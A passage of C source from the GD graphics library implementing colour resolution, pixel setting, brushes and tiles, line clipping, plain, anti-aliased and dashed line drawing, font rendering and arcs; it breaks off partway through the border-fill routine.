op = c; /* Save open slot */
continue; /* Color not in use */
}
if (c == im->transparent)
{
/* don't ever resolve to the color that has
* been designated as the transparent color */
continue;
}
rd = (long) (im->red[c] - r);
gd = (long) (im->green[c] - g);
bd = (long) (im->blue[c] - b);
ad = (long) (im->alpha[c] - a);
dist = rd * rd + gd * gd + bd * bd + ad * ad;
if (dist < mindist)
{
if (dist == 0)
{
return c; /* Return exact match color */
}
mindist = dist;
ct = c;
}
}
/* no exact match. We now know closest, but first try to allocate exact */
if (op == -1)
{
op = im->colorsTotal;
if (op == gdMaxColors)
{ /* No room for more colors */
return ct; /* Return closest available color */
}
im->colorsTotal++;
}
im->red[op] = r;
im->green[op] = g;
im->blue[op] = b;
im->alpha[op] = a;
im->open[op] = 0;
return op; /* Return newly allocated color */
}
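/* Illustrative call (not compiled, assumes im is an existing palette image):
 * resolve an entry for roughly half-transparent red in one pass instead of
 * the Exact/Allocate/Closest cascade shown above. gdAlphaMax is 127, so an
 * alpha of 64 is about 50% transparent.
 */
#if 0
{
int c = gdImageColorResolveAlpha(im, 255, 0, 0, 64);
gdImageSetPixel(im, 10, 10, c);
}
#endif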
void gdImageColorDeallocate (gdImagePtr im, int color)
{
if (im->trueColor) {
return;
}
/* Mark it open. */
im->open[color] = 1;
}
void gdImageColorTransparent (gdImagePtr im, int color)
{
if (!im->trueColor) {
if (im->transparent != -1) {
im->alpha[im->transparent] = gdAlphaOpaque;
}
if (color > -1 && color < im->colorsTotal && color < gdMaxColors) {
im->alpha[color] = gdAlphaTransparent;
} else {
return;
}
}
im->transparent = color;
}
void gdImagePaletteCopy (gdImagePtr to, gdImagePtr from)
{
int i;
int x, y, p;
int xlate[256];
if (to->trueColor || from->trueColor) {
return;
}
for (i = 0; i < 256; i++) {
xlate[i] = -1;
}
for (y = 0; y < to->sy; y++) {
for (x = 0; x < to->sx; x++) {
p = gdImageGetPixel(to, x, y);
if (xlate[p] == -1) {
/* This ought to use HWB, but we don't have an alpha-aware version of that yet. */
xlate[p] = gdImageColorClosestAlpha (from, to->red[p], to->green[p], to->blue[p], to->alpha[p]);
}
gdImageSetPixel(to, x, y, xlate[p]);
}
}
for (i = 0; i < from->colorsTotal; i++) {
to->red[i] = from->red[i];
to->blue[i] = from->blue[i];
to->green[i] = from->green[i];
to->alpha[i] = from->alpha[i];
to->open[i] = 0;
}
for (i = from->colorsTotal; i < to->colorsTotal; i++) {
to->open[i] = 1;
}
to->colorsTotal = from->colorsTotal;
}
/* 2.0.10: before the drawing routines, some code to clip points that are
* outside the drawing window. Nick Atty (nick@canalplan.org.uk)
*
* This is the Sutherland Hodgman Algorithm, as implemented by
* Duvanenko, Robbins and Gyurcsik - SH(DRG) for short. See Dr Dobb's
* Journal, January 1996, pp107-110 and 116-117
*
* Given the end points of a line, and a bounding rectangle (which we
* know to be from (0,0) to (SX,SY)), adjust the endpoints to be on
* the edges of the rectangle if the line should be drawn at all,
* otherwise return a failure code
*/
/* this does "one-dimensional" clipping: note that the second time it
* is called, all the x parameters refer to height and the y to width
* - the comments ignore this (if you can understand it when it's
* looking at the X parameters, it should become clear what happens on
* the second call!) The code is simplified from that in the article,
* as we know that gd images always start at (0,0)
*/
static int clip_1d(int *x0, int *y0, int *x1, int *y1, int maxdim) {
double m; /* gradient of line */
if (*x0 < 0) { /* start of line is left of window */
if(*x1 < 0) { /* as is the end, so the line never cuts the window */
return 0;
}
m = (*y1 - *y0)/(double)(*x1 - *x0); /* calculate the slope of the line */
/* adjust x0 to be on the left boundary (ie to be zero), and y0 to match */
*y0 -= (int)(m * *x0);
*x0 = 0;
/* now, perhaps, adjust the far end of the line as well */
if (*x1 > maxdim) {
*y1 += (int)(m * (maxdim - *x1));
*x1 = maxdim;
}
return 1;
}
if (*x0 > maxdim) { /* start of line is right of window - complement of above */
if (*x1 > maxdim) { /* as is the end, so the line misses the window */
return 0;
}
m = (*y1 - *y0)/(double)(*x1 - *x0); /* calculate the slope of the line */
*y0 += (int)(m * (maxdim - *x0)); /* adjust so point is on the right boundary */
*x0 = maxdim;
/* now, perhaps, adjust the end of the line */
if (*x1 < 0) {
*y1 -= (int)(m * *x1);
*x1 = 0;
}
return 1;
}
/* the final case - the start of the line is inside the window */
if (*x1 > maxdim) { /* other end is outside to the right */
m = (*y1 - *y0)/(double)(*x1 - *x0); /* calculate the slope of the line */
*y1 += (int)(m * (maxdim - *x1));
*x1 = maxdim;
return 1;
}
if (*x1 < 0) { /* other end is outside to the left */
m = (*y1 - *y0)/(double)(*x1 - *x0); /* calculate the slope of the line */
*y1 -= (int)(m * *x1);
*x1 = 0;
return 1;
}
/* only get here if both points are inside the window */
return 1;
}
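/* clip_1d is applied twice per line: once with the x coordinates against
 * the image width, and once with the roles of x and y swapped against the
 * image height, as done at the top of gdImageLine below. The line is
 * dropped as soon as either call reports that it lies entirely outside the
 * window in that dimension.
 */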
void gdImageSetPixel (gdImagePtr im, int x, int y, int color)
{
int p;
switch (color) {
case gdStyled:
if (!im->style) {
/* Refuse to draw if no style is set. */
return;
} else {
p = im->style[im->stylePos++];
}
if (p != gdTransparent) {
gdImageSetPixel(im, x, y, p);
}
im->stylePos = im->stylePos % im->styleLength;
break;
case gdStyledBrushed:
if (!im->style) {
/* Refuse to draw if no style is set. */
return;
}
p = im->style[im->stylePos++];
if (p != gdTransparent && p != 0) {
gdImageSetPixel(im, x, y, gdBrushed);
}
im->stylePos = im->stylePos % im->styleLength;
break;
case gdBrushed:
gdImageBrushApply(im, x, y);
break;
case gdTiled:
gdImageTileApply(im, x, y);
break;
case gdAntiAliased:
gdImageAntiAliasedApply(im, x, y);
break;
default:
if (gdImageBoundsSafe(im, x, y)) {
if (im->trueColor) {
switch (im->alphaBlendingFlag) {
default:
case gdEffectReplace:
im->tpixels[y][x] = color;
break;
case gdEffectAlphaBlend:
im->tpixels[y][x] = gdAlphaBlend(im->tpixels[y][x], color);
break;
case gdEffectNormal:
im->tpixels[y][x] = gdAlphaBlend(im->tpixels[y][x], color);
break;
case gdEffectOverlay :
im->tpixels[y][x] = gdLayerOverlay(im->tpixels[y][x], color);
break;
}
} else {
im->pixels[y][x] = color;
}
}
break;
}
}
int gdImageGetTrueColorPixel (gdImagePtr im, int x, int y)
{
int p = gdImageGetPixel(im, x, y);
if (!im->trueColor) {
return gdTrueColorAlpha(im->red[p], im->green[p], im->blue[p], (im->transparent == p) ? gdAlphaTransparent : im->alpha[p]);
} else {
return p;
}
}
static void gdImageBrushApply (gdImagePtr im, int x, int y)
{
int lx, ly;
int hy, hx;
int x1, y1, x2, y2;
int srcx, srcy;
if (!im->brush) {
return;
}
hy = gdImageSY(im->brush) / 2;
y1 = y - hy;
y2 = y1 + gdImageSY(im->brush);
hx = gdImageSX(im->brush) / 2;
x1 = x - hx;
x2 = x1 + gdImageSX(im->brush);
srcy = 0;
if (im->trueColor) {
if (im->brush->trueColor) {
for (ly = y1; ly < y2; ly++) {
srcx = 0;
for (lx = x1; (lx < x2); lx++) {
int p;
p = gdImageGetTrueColorPixel(im->brush, srcx, srcy);
/* 2.0.9, Thomas Winzig: apply simple full transparency */
if (p != gdImageGetTransparent(im->brush)) {
gdImageSetPixel(im, lx, ly, p);
}
srcx++;
}
srcy++;
}
} else {
/* 2.0.12: Brush palette, image truecolor (thanks to Thorben Kundinger for pointing out the issue) */
for (ly = y1; ly < y2; ly++) {
srcx = 0;
for (lx = x1; lx < x2; lx++) {
int p, tc;
p = gdImageGetPixel(im->brush, srcx, srcy);
tc = gdImageGetTrueColorPixel(im->brush, srcx, srcy);
/* 2.0.9, Thomas Winzig: apply simple full transparency */
if (p != gdImageGetTransparent(im->brush)) {
gdImageSetPixel(im, lx, ly, tc);
}
srcx++;
}
srcy++;
}
}
} else {
for (ly = y1; ly < y2; ly++) {
srcx = 0;
for (lx = x1; lx < x2; lx++) {
int p;
p = gdImageGetPixel(im->brush, srcx, srcy);
/* Allow for non-square brushes! */
if (p != gdImageGetTransparent(im->brush)) {
/* Truecolor brush. Very slow on a palette destination. */
if (im->brush->trueColor) {
gdImageSetPixel(im, lx, ly, gdImageColorResolveAlpha(im, gdTrueColorGetRed(p),
gdTrueColorGetGreen(p),
gdTrueColorGetBlue(p),
gdTrueColorGetAlpha(p)));
} else {
gdImageSetPixel(im, lx, ly, im->brushColorMap[p]);
}
}
srcx++;
}
srcy++;
}
}
}
static void gdImageTileApply (gdImagePtr im, int x, int y)
{
gdImagePtr tile = im->tile;
int srcx, srcy;
int p;
if (!tile) {
return;
}
srcx = x % gdImageSX(tile);
srcy = y % gdImageSY(tile);
if (im->trueColor) {
p = gdImageGetPixel(tile, srcx, srcy);
if (p != gdImageGetTransparent (tile)) {
if (!tile->trueColor) {
p = gdTrueColorAlpha(tile->red[p], tile->green[p], tile->blue[p], tile->alpha[p]);
}
gdImageSetPixel(im, x, y, p);
}
} else {
p = gdImageGetPixel(tile, srcx, srcy);
/* Allow for transparency */
if (p != gdImageGetTransparent(tile)) {
if (tile->trueColor) {
/* Truecolor tile. Very slow on a palette destination. */
gdImageSetPixel(im, x, y, gdImageColorResolveAlpha(im,
gdTrueColorGetRed(p),
gdTrueColorGetGreen(p),
gdTrueColorGetBlue(p),
gdTrueColorGetAlpha(p)));
} else {
gdImageSetPixel(im, x, y, im->tileColorMap[p]);
}
}
}
}
static int gdImageTileGet (gdImagePtr im, int x, int y)
{
int srcx, srcy;
int tileColor,p;
if (!im->tile) {
return -1;
}
srcx = x % gdImageSX(im->tile);
srcy = y % gdImageSY(im->tile);
p = gdImageGetPixel(im->tile, srcx, srcy);
if (im->trueColor) {
if (im->tile->trueColor) {
tileColor = p;
} else {
tileColor = gdTrueColorAlpha( gdImageRed(im->tile,p), gdImageGreen(im->tile,p), gdImageBlue (im->tile,p), gdImageAlpha (im->tile,p));
}
} else {
if (im->tile->trueColor) {
tileColor = gdImageColorResolveAlpha(im, gdTrueColorGetRed (p), gdTrueColorGetGreen (p), gdTrueColorGetBlue (p), gdTrueColorGetAlpha (p));
} else {
tileColor = gdImageColorResolveAlpha(im, gdImageRed (im->tile,p), gdImageGreen (im->tile,p), gdImageBlue (im->tile,p), gdImageAlpha (im->tile,p));
}
}
return tileColor;
}
static void gdImageAntiAliasedApply (gdImagePtr im, int px, int py)
{
float p_dist, p_alpha;
unsigned char opacity;
/*
* Find the perpendicular distance from point C (px, py) to the line
* segment AB that is being drawn. (Adapted from an algorithm from the
* comp.graphics.algorithms FAQ.)
*/
int LAC_2, LBC_2;
int Ax_Cx = im->AAL_x1 - px;
int Ay_Cy = im->AAL_y1 - py;
int Bx_Cx = im->AAL_x2 - px;
int By_Cy = im->AAL_y2 - py;
/* 2.0.13: bounds check! AA_opacity is just as capable of
* overflowing as the main pixel array. Arne Jorgensen.
* 2.0.14: typo fixed. 2.0.15: moved down below declarations
* to satisfy non-C++ compilers.
*/
if (!gdImageBoundsSafe(im, px, py)) {
return;
}
/* Get the squares of the lengths of the segments AC and BC. */
LAC_2 = (Ax_Cx * Ax_Cx) + (Ay_Cy * Ay_Cy);
LBC_2 = (Bx_Cx * Bx_Cx) + (By_Cy * By_Cy);
if (((im->AAL_LAB_2 + LAC_2) >= LBC_2) && ((im->AAL_LAB_2 + LBC_2) >= LAC_2)) {
/* The two angles are acute. The point lies inside the portion of the
* plane spanned by the line segment.
*/
p_dist = fabs ((float) ((Ay_Cy * im->AAL_Bx_Ax) - (Ax_Cx * im->AAL_By_Ay)) / im->AAL_LAB);
} else {
/* The point is past an end of the line segment. Its distance from the
 * segment is the shorter of the distances to the two endpoints, but we
 * call it -1 so that no alpha is computed and no pixel is drawn.
 */
p_dist = -1;
}
if ((p_dist >= 0) && (p_dist <= (float) (im->thick))) {
p_alpha = pow (1.0 - (p_dist / 1.5), 2);
if (p_alpha > 0) {
if (p_alpha >= 1) {
opacity = 255;
} else {
opacity = (unsigned char) (p_alpha * 255.0);
}
if (!im->AA_polygon || (im->AA_opacity[py][px] < opacity)) {
im->AA_opacity[py][px] = opacity;
}
}
}
}
int gdImageGetPixel (gdImagePtr im, int x, int y)
{
if (gdImageBoundsSafe(im, x, y)) {
if (im->trueColor) {
return im->tpixels[y][x];
} else {
return im->pixels[y][x];
}
} else {
return 0;
}
}
void gdImageAABlend (gdImagePtr im)
{
float p_alpha, old_alpha;
int color = im->AA_color, color_red, color_green, color_blue;
int old_color, old_red, old_green, old_blue;
int p_color, p_red, p_green, p_blue;
int px, py;
color_red = gdImageRed(im, color);
color_green = gdImageGreen(im, color);
color_blue = gdImageBlue(im, color);
/* Impose the anti-aliased drawing on the image. */
for (py = 0; py < im->sy; py++) {
for (px = 0; px < im->sx; px++) {
if (im->AA_opacity[py][px] != 0) {
old_color = gdImageGetPixel(im, px, py);
if ((old_color != color) && ((old_color != im->AA_dont_blend) || (im->AA_opacity[py][px] == 255))) {
/* Only blend with different colors that aren't the dont_blend color. */
p_alpha = (float) (im->AA_opacity[py][px]) / 255.0;
old_alpha = 1.0 - p_alpha;
if (p_alpha >= 1.0) {
p_color = color;
} else {
old_red = gdImageRed(im, old_color);
old_green = gdImageGreen(im, old_color);
old_blue = gdImageBlue(im, old_color);
p_red = (int) (((float) color_red * p_alpha) + ((float) old_red * old_alpha));
p_green = (int) (((float) color_green * p_alpha) + ((float) old_green * old_alpha));
p_blue = (int) (((float) color_blue * p_alpha) + ((float) old_blue * old_alpha));
p_color = gdImageColorResolve(im, p_red, p_green, p_blue);
}
gdImageSetPixel(im, px, py, p_color);
}
}
}
/* Clear the AA_opacity array behind us. */
memset(im->AA_opacity[py], 0, im->sx);
}
}
static void gdImageHLine(gdImagePtr im, int y, int x1, int x2, int col)
{
if (im->thick > 1) {
int thickhalf = im->thick >> 1;
gdImageFilledRectangle(im, x1, y - thickhalf, x2, y + im->thick - thickhalf - 1, col);
} else {
if (x2 < x1) {
int t = x2;
x2 = x1;
x1 = t;
}
for (;x1 <= x2; x1++) {
gdImageSetPixel(im, x1, y, col);
}
}
return;
}
static void gdImageVLine(gdImagePtr im, int x, int y1, int y2, int col)
{
if (im->thick > 1) {
int thickhalf = im->thick >> 1;
gdImageFilledRectangle(im, x - thickhalf, y1, x + im->thick - thickhalf - 1, y2, col);
} else {
if (y2 < y1) {
int t = y1;
y1 = y2;
y2 = t;
}
for (;y1 <= y2; y1++) {
gdImageSetPixel(im, x, y1, col);
}
}
return;
}
/* Bresenham as presented in Foley & Van Dam */
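/* The integer decision variable d below starts at 2*dy - dx (2*dx - dy for
 * the steep case) and is stepped by incr1/incr2 so that the minor axis
 * advances whenever the accumulated error passes the half-pixel mark.
 * Thickness is handled by "wid": at every step a run of wid pixels along
 * the minor axis, centred on the ideal line, is drawn instead of a single
 * pixel.
 */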
void gdImageLine (gdImagePtr im, int x1, int y1, int x2, int y2, int color)
{
int dx, dy, incr1, incr2, d, x, y, xend, yend, xdirflag, ydirflag;
int wid;
int w, wstart;
int thick = im->thick;
if (color == gdAntiAliased) {
/*
gdAntiAliased passed as color: use the much faster, much cheaper
and equally attractive gdImageAALine implementation. That
clips too, so don't clip twice.
*/
gdImageAALine(im, x1, y1, x2, y2, im->AA_color);
return;
}
/* 2.0.10: Nick Atty: clip to edges of drawing rectangle, return if no points need to be drawn */
if (!clip_1d(&x1,&y1,&x2,&y2,gdImageSX(im)) || !clip_1d(&y1,&x1,&y2,&x2,gdImageSY(im))) {
return;
}
dx = abs (x2 - x1);
dy = abs (y2 - y1);
if (dx == 0) {
gdImageVLine(im, x1, y1, y2, color);
return;
} else if (dy == 0) {
gdImageHLine(im, y1, x1, x2, color);
return;
}
if (dy <= dx) {
/* More-or-less horizontal. use wid for vertical stroke */
/* Doug Claar: watch out for NaN in atan2 (2.0.5) */
if ((dx == 0) && (dy == 0)) {
wid = 1;
} else {
/* 2.0.12: Michael Schwartz: divide rather than multiply;
TBB: but watch out for /0! */
double ac = cos (atan2 (dy, dx));
if (ac != 0) {
wid = thick / ac;
} else {
wid = 1;
}
if (wid == 0) {
wid = 1;
}
}
d = 2 * dy - dx;
incr1 = 2 * dy;
incr2 = 2 * (dy - dx);
if (x1 > x2) {
x = x2;
y = y2;
ydirflag = (-1);
xend = x1;
} else {
x = x1;
y = y1;
ydirflag = 1;
xend = x2;
}
/* Set up line thickness */
wstart = y - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel(im, x, w, color);
}
if (((y2 - y1) * ydirflag) > 0) {
while (x < xend) {
x++;
if (d < 0) {
d += incr1;
} else {
y++;
d += incr2;
}
wstart = y - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, x, w, color);
}
}
} else {
while (x < xend) {
x++;
if (d < 0) {
d += incr1;
} else {
y--;
d += incr2;
}
wstart = y - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, x, w, color);
}
}
}
} else {
/* More-or-less vertical. use wid for horizontal stroke */
/* 2.0.12: Michael Schwartz: divide rather than multiply;
TBB: but watch out for /0! */
double as = sin (atan2 (dy, dx));
if (as != 0) {
wid = thick / as;
} else {
wid = 1;
}
if (wid == 0) {
wid = 1;
}
d = 2 * dx - dy;
incr1 = 2 * dx;
incr2 = 2 * (dx - dy);
if (y1 > y2) {
y = y2;
x = x2;
yend = y1;
xdirflag = (-1);
} else {
y = y1;
x = x1;
yend = y2;
xdirflag = 1;
}
/* Set up line thickness */
wstart = x - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, w, y, color);
}
if (((x2 - x1) * xdirflag) > 0) {
while (y < yend) {
y++;
if (d < 0) {
d += incr1;
} else {
x++;
d += incr2;
}
wstart = x - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, w, y, color);
}
}
} else {
while (y < yend) {
y++;
if (d < 0) {
d += incr1;
} else {
x--;
d += incr2;
}
wstart = x - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel (im, w, y, color);
}
}
}
}
}
/*
* Added on 2003/12 by Pierre-Alain Joye (pajoye@pearfr.org)
* */
#define BLEND_COLOR(a, nc, c, cc) \
nc = (cc) + (((((c) - (cc)) * (a)) + ((((c) - (cc)) * (a)) >> 8) + 0x80) >> 8);
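/* BLEND_COLOR computes nc = cc + (c - cc) * a / 255 without a division:
 * for x = (c - cc) * a, the expression (x + (x >> 8) + 0x80) >> 8 is the
 * usual integer approximation of a rounded divide by 255, since
 * x/255 is approximately (x + x/256) / 256.
 */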
inline static void gdImageSetAAPixelColor(gdImagePtr im, int x, int y, int color, int t)
{
int dr,dg,db,p,r,g,b;
dr = gdTrueColorGetRed(color);
dg = gdTrueColorGetGreen(color);
db = gdTrueColorGetBlue(color);
p = gdImageGetPixel(im,x,y);
r = gdTrueColorGetRed(p);
g = gdTrueColorGetGreen(p);
b = gdTrueColorGetBlue(p);
BLEND_COLOR(t, dr, r, dr);
BLEND_COLOR(t, dg, g, dg);
BLEND_COLOR(t, db, b, db);
im->tpixels[y][x]=gdTrueColorAlpha(dr, dg, db, gdAlphaOpaque);
}
/*
* Added on 2003/12 by Pierre-Alain Joye (pajoye@pearfr.org)
**/
void gdImageAALine (gdImagePtr im, int x1, int y1, int x2, int y2, int col)
{
/* keep them as 32bits */
long x, y, inc;
long dx, dy,tmp;
if (y1 < 0 && y2 < 0) {
return;
}
if (y1 < 0) {
x1 += (y1 * (x1 - x2)) / (y2 - y1);
y1 = 0;
}
if (y2 < 0) {
x2 += (y2 * (x1 - x2)) / (y2 - y1);
y2 = 0;
}
/* bottom edge */
if (y1 >= im->sy && y2 >= im->sy) {
return;
}
if (y1 >= im->sy) {
x1 -= ((im->sy - y1) * (x1 - x2)) / (y2 - y1);
y1 = im->sy - 1;
}
if (y2 >= im->sy) {
x2 -= ((im->sy - y2) * (x1 - x2)) / (y2 - y1);
y2 = im->sy - 1;
}
/* left edge */
if (x1 < 0 && x2 < 0) {
return;
}
if (x1 < 0) {
y1 += (x1 * (y1 - y2)) / (x2 - x1);
x1 = 0;
}
if (x2 < 0) {
y2 += (x2 * (y1 - y2)) / (x2 - x1);
x2 = 0;
}
/* right edge */
if (x1 >= im->sx && x2 >= im->sx) {
return;
}
if (x1 >= im->sx) {
y1 -= ((im->sx - x1) * (y1 - y2)) / (x2 - x1);
x1 = im->sx - 1;
}
if (x2 >= im->sx) {
y2 -= ((im->sx - x2) * (y1 - y2)) / (x2 - x1);
x2 = im->sx - 1;
}
dx = x2 - x1;
dy = y2 - y1;
if (dx == 0 && dy == 0) {
return;
}
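/* From here on the line is stepped with a 16.16 fixed-point DDA: the major
 * axis advances one whole pixel (1 << 16) per iteration while the minor
 * axis accumulates "inc". The top byte of the minor coordinate's fraction
 * ((y >> 8) & 0xFF here, x in the steep branch) is used directly as the
 * blend weight for the two pixels that straddle the ideal line.
 */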
if (abs(dx) > abs(dy)) {
if (dx < 0) {
tmp = x1;
x1 = x2;
x2 = tmp;
tmp = y1;
y1 = y2;
y2 = tmp;
dx = x2 - x1;
dy = y2 - y1;
}
x = x1 << 16;
y = y1 << 16;
inc = (dy * 65536) / dx;
while ((x >> 16) <= x2) {
gdImageSetAAPixelColor(im, x >> 16, y >> 16, col, (y >> 8) & 0xFF);
if ((y >> 16) + 1 < im->sy) {
gdImageSetAAPixelColor(im, x >> 16, (y >> 16) + 1,col, (~y >> 8) & 0xFF);
}
x += (1 << 16);
y += inc;
}
} else {
if (dy < 0) {
tmp = x1;
x1 = x2;
x2 = tmp;
tmp = y1;
y1 = y2;
y2 = tmp;
dx = x2 - x1;
dy = y2 - y1;
}
x = x1 << 16;
y = y1 << 16;
inc = (dx * 65536) / dy;
while ((y>>16) <= y2) {
gdImageSetAAPixelColor(im, x >> 16, y >> 16, col, (x >> 8) & 0xFF);
if ((x >> 16) + 1 < im->sx) {
gdImageSetAAPixelColor(im, (x >> 16) + 1, (y >> 16),col, (~x >> 8) & 0xFF);
}
x += inc;
y += (1<<16);
}
}
}
static void dashedSet (gdImagePtr im, int x, int y, int color, int *onP, int *dashStepP, int wid, int vert);
void gdImageDashedLine (gdImagePtr im, int x1, int y1, int x2, int y2, int color)
{
int dx, dy, incr1, incr2, d, x, y, xend, yend, xdirflag, ydirflag;
int dashStep = 0;
int on = 1;
int wid;
int vert;
int thick = im->thick;
dx = abs(x2 - x1);
dy = abs(y2 - y1);
if (dy <= dx) {
/* More-or-less horizontal. use wid for vertical stroke */
/* 2.0.12: Michael Schwartz: divide rather than multiply;
TBB: but watch out for /0! */
double as = sin(atan2(dy, dx));
if (as != 0) {
wid = thick / as;
} else {
wid = 1;
}
if (wid == 0) {
wid = 1;
}
vert = 1;
d = 2 * dy - dx;
incr1 = 2 * dy;
incr2 = 2 * (dy - dx);
if (x1 > x2) {
x = x2;
y = y2;
ydirflag = (-1);
xend = x1;
} else {
x = x1;
y = y1;
ydirflag = 1;
xend = x2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
if (((y2 - y1) * ydirflag) > 0) {
while (x < xend) {
x++;
if (d < 0) {
d += incr1;
} else {
y++;
d += incr2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
}
} else {
while (x < xend) {
x++;
if (d < 0) {
d += incr1;
} else {
y--;
d += incr2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
}
}
} else {
/* 2.0.12: Michael Schwartz: divide rather than multiply;
TBB: but watch out for /0! */
double as = sin (atan2 (dy, dx));
if (as != 0) {
wid = thick / as;
} else {
wid = 1;
}
vert = 0;
d = 2 * dx - dy;
incr1 = 2 * dx;
incr2 = 2 * (dx - dy);
if (y1 > y2) {
y = y2;
x = x2;
yend = y1;
xdirflag = (-1);
} else {
y = y1;
x = x1;
yend = y2;
xdirflag = 1;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
if (((x2 - x1) * xdirflag) > 0) {
while (y < yend) {
y++;
if (d < 0) {
d += incr1;
} else {
x++;
d += incr2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
}
} else {
while (y < yend) {
y++;
if (d < 0) {
d += incr1;
} else {
x--;
d += incr2;
}
dashedSet(im, x, y, color, &on, &dashStep, wid, vert);
}
}
}
}
static void dashedSet (gdImagePtr im, int x, int y, int color, int *onP, int *dashStepP, int wid, int vert)
{
int dashStep = *dashStepP;
int on = *onP;
int w, wstart;
dashStep++;
if (dashStep == gdDashSize) {
dashStep = 0;
on = !on;
}
if (on) {
if (vert) {
wstart = y - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel(im, x, w, color);
}
} else {
wstart = x - wid / 2;
for (w = wstart; w < wstart + wid; w++) {
gdImageSetPixel(im, w, y, color);
}
}
}
*dashStepP = dashStep;
*onP = on;
}
void gdImageChar (gdImagePtr im, gdFontPtr f, int x, int y, int c, int color)
{
int cx, cy;
int px, py;
int fline;
cx = 0;
cy = 0;
#ifdef CHARSET_EBCDIC
c = ASC (c);
#endif /*CHARSET_EBCDIC */
if ((c < f->offset) || (c >= (f->offset + f->nchars))) {
return;
}
fline = (c - f->offset) * f->h * f->w;
for (py = y; (py < (y + f->h)); py++) {
for (px = x; (px < (x + f->w)); px++) {
if (f->data[fline + cy * f->w + cx]) {
gdImageSetPixel(im, px, py, color);
}
cx++;
}
cx = 0;
cy++;
}
}
void gdImageCharUp (gdImagePtr im, gdFontPtr f, int x, int y, int c, int color)
{
int cx, cy;
int px, py;
int fline;
cx = 0;
cy = 0;
#ifdef CHARSET_EBCDIC
c = ASC (c);
#endif /*CHARSET_EBCDIC */
if ((c < f->offset) || (c >= (f->offset + f->nchars))) {
return;
}
fline = (c - f->offset) * f->h * f->w;
for (py = y; py > (y - f->w); py--) {
for (px = x; px < (x + f->h); px++) {
if (f->data[fline + cy * f->w + cx]) {
gdImageSetPixel(im, px, py, color);
}
cy++;
}
cy = 0;
cx++;
}
}
void gdImageString (gdImagePtr im, gdFontPtr f, int x, int y, unsigned char *s, int color)
{
int i;
int l;
l = strlen ((char *) s);
for (i = 0; (i < l); i++) {
gdImageChar(im, f, x, y, s[i], color);
x += f->w;
}
}
void gdImageStringUp (gdImagePtr im, gdFontPtr f, int x, int y, unsigned char *s, int color)
{
int i;
int l;
l = strlen ((char *) s);
for (i = 0; (i < l); i++) {
gdImageCharUp(im, f, x, y, s[i], color);
y -= f->w;
}
}
static int strlen16 (unsigned short *s);
void gdImageString16 (gdImagePtr im, gdFontPtr f, int x, int y, unsigned short *s, int color)
{
int i;
int l;
l = strlen16(s);
for (i = 0; (i < l); i++) {
gdImageChar(im, f, x, y, s[i], color);
x += f->w;
}
}
void gdImageStringUp16 (gdImagePtr im, gdFontPtr f, int x, int y, unsigned short *s, int color)
{
int i;
int l;
l = strlen16(s);
for (i = 0; i < l; i++) {
gdImageCharUp(im, f, x, y, s[i], color);
y -= f->w;
}
}
static int strlen16 (unsigned short *s)
{
int len = 0;
while (*s) {
s++;
len++;
}
return len;
}
#ifndef HAVE_LSQRT
/* If you don't have a nice square root function for longs, you can use
** this hack
*/
long lsqrt (long n)
{
long result = (long) sqrt ((double) n);
return result;
}
#endif
/* s and e are integers modulo 360 (degrees), with 0 degrees
being the rightmost extreme and degrees changing clockwise.
cx and cy are the center in pixels; w and h are the horizontal
and vertical diameter in pixels. Nice interface, but slow.
See gd_arc_f_buggy.c for a better version that doesn't
seem to be bug-free yet. */
void gdImageArc (gdImagePtr im, int cx, int cy, int w, int h, int s, int e, int color)
{
if ((s % 360) == (e % 360)) {
gdImageEllipse(im, cx, cy, w, h, color);
} else {
gdImageFilledArc(im, cx, cy, w, h, s, e, color, gdNoFill);
}
}
void gdImageFilledArc (gdImagePtr im, int cx, int cy, int w, int h, int s, int e, int color, int style)
{
gdPoint pts[3];
int i;
int lx = 0, ly = 0;
int fx = 0, fy = 0;
if ((s % 360) == (e % 360)) {
s = 0; e = 360;
} else {
if (s > 360) {
s = s % 360;
}
if (e > 360) {
e = e % 360;
}
while (s < 0) {
s += 360;
}
while (e < s) {
e += 360;
}
if (s == e) {
s = 0; e = 360;
}
}
for (i = s; i <= e; i++) {
int x, y;
x = ((long) gdCosT[i % 360] * (long) w / (2 * 1024)) + cx;
y = ((long) gdSinT[i % 360] * (long) h / (2 * 1024)) + cy;
if (i != s) {
if (!(style & gdChord)) {
if (style & gdNoFill) {
gdImageLine(im, lx, ly, x, y, color);
} else {
/* This is expensive! */
pts[0].x = lx;
pts[0].y = ly;
pts[1].x = x;
pts[1].y = y;
pts[2].x = cx;
pts[2].y = cy;
gdImageFilledPolygon(im, pts, 3, color);
}
}
} else {
fx = x;
fy = y;
}
lx = x;
ly = y;
}
if (style & gdChord) {
if (style & gdNoFill) {
if (style & gdEdged) {
gdImageLine(im, cx, cy, lx, ly, color);
gdImageLine(im, cx, cy, fx, fy, color);
}
gdImageLine(im, fx, fy, lx, ly, color);
} else {
pts[0].x = fx;
pts[0].y = fy;
pts[1].x = lx;
pts[1].y = ly;
pts[2].x = cx;
pts[2].y = cy;
gdImageFilledPolygon(im, pts, 3, color);
}
} else {
if (style & gdNoFill) {
if (style & gdEdged) {
gdImageLine(im, cx, cy, lx, ly, color);
gdImageLine(im, cx, cy, fx, fy, color);
}
}
}
}
void gdImageFillToBorder (gdImagePtr im, int x, int y, int border, int color)
{
int lastBorder;
/* Seek left */
int leftLimit = -1, rightLimit;
int i, restoreAlphaBlending = 0;
if (border < 0) {
/* Refuse to fill to a non-solid border */
return;
}
restoreAlphaBlending = im->alphaBlendingFlag;
im->alphaBlendingFlag = 0;
if (x >= im->sx) {
x = im->sx - 1;
} else if (x < 0) {
x = 0;
}
if (y >= im->sy) {
y = im->sy - 1;
} else if (y < 0) {
y = 0;
}
for (i = x; i >= 0; i--) {
if (gdImageGetPixel(im, i, y) == border) {
break;
}
gdImageSetPixel(im, i, y, color);
